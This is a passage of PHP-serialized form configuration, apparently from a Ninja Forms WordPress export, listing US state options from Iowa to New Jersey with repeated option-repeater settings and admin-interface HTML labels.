Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:16;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Iowa\";s:5:\"value\";s:2:\"IA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:17;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Kansas\";s:5:\"value\";s:2:\"KS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:18;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Kentucky\";s:5:\"value\";s:2:\"KY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:19;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Louisiana\";s:5:\"value\";s:2:\"LA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:20;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Maine\";s:5:\"value\";s:2:\"ME\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:21;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Maryland\";s:5:\"value\";s:2:\"MD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:22;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"Massachusetts\";s:5:\"value\";s:2:\"MA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:23;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Michigan\";s:5:\"value\";s:2:\"MI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:24;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Minnesota\";s:5:\"value\";s:2:\"MN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:25;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:11:\"Mississippi\";s:5:\"value\";s:2:\"MS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:26;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Missouri\";s:5:\"value\";s:2:\"MO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:27;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Montana\";s:5:\"value\";s:2:\"MT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:28;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Nebraska\";s:5:\"value\";s:2:\"NE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:29;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Nevada\";s:5:\"value\";s:2:\"NV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:30;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"New Hampshire\";s:5:\"value\";s:2:\"NH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:31;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"New Jersey\";s:5:\"value\";s:2:\"NJ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 